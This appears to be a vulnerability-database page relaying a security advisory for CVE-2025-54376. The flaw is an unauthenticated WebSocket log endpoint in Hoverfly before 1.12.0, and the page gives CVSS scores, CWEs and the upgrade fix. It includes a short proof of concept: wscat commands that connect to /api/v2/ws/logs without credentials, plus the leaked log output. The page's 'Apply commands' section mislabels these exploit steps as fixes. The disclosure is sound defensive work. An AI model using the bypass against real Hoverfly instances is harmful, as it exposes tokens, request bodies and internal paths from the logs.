VIR Vulnerability Intelligence Relay

CVE-2025-54376

high
Published 2025-09-10 · Modified 2026-03-03
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4 NEW
7.8
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VIR risk
7.5

Description

WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled in github.com/SpectoLabs/hoverfly

Predictions

Exploit likelihood
83%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: GitHub Security Advisory · View original ↗ · CC-BY-4.0

<h3>WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled</h3> Summary Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can: - Stream real-time application logs (information disclosure). - Gain insight into internal…

<h3>WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled</h3>

Summary

Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can:

- Stream real-time application logs (information disclosure). - Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.

PoC

1. Start Hoverfly with authentication enabled:

./hoverfly -auth

2. Confirm REST API requires credentials:

curl -i http://localhost:8888/api/v2/hoverfly/version

3. Connect to the WebSocket endpoint without credentials:

wscat -c ws://localhost:8888/api/v2/ws/logs
# Connected (press CTRL+C to quit)
# … logs stream immediately … (You would need to send a message to start receiving stream)


wscat -c ws://localhost:8888/api/v2/ws/logs
Connected (press CTRL+C to quit)
> hi!
< {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]}
< ...
< ...

Impact

Authentication bypass; an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.

Apply commands

text fix
- Stream real-time application logs (information disclosure). - Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.
./hoverfly -auth
text fix
2. Confirm REST API requires credentials:
curl -i http://localhost:8888/api/v2/hoverfly/version
text fix
3. Connect to the WebSocket endpoint without credentials:
wscat -c ws://localhost:8888/api/v2/ws/logs
# Connected (press CTRL+C to quit)
# … logs stream immediately … (You would need to send a message to start receiving stream)
text fix
3. Connect to the WebSocket endpoint without credentials:
wscat -c ws://localhost:8888/api/v2/ws/logs
Connected (press CTRL+C to quit)
> hi!
< {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]}
< ...
< ...
bash fix
Upgrade github.com/SpectoLabs/hoverfly to 1.12.0
go get github.com/SpectoLabs/hoverfly@1.12.0

Affected

VendorProductVersion
gogithub.com/SpectoLabs/hoverfly< 1.12.0

Package impact
EcosystemPackageVulnerableFixed
golang Gogithub.com/SpectoLabs/hoverfly<1.12.01.12.0

Application impact
VendorProductVersionsFixed
hoverflyhoverfly{"endExcluding":"1.12.0"}1.12.0

References

CWEs

CWE-200 CWE-287 CWE-532

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.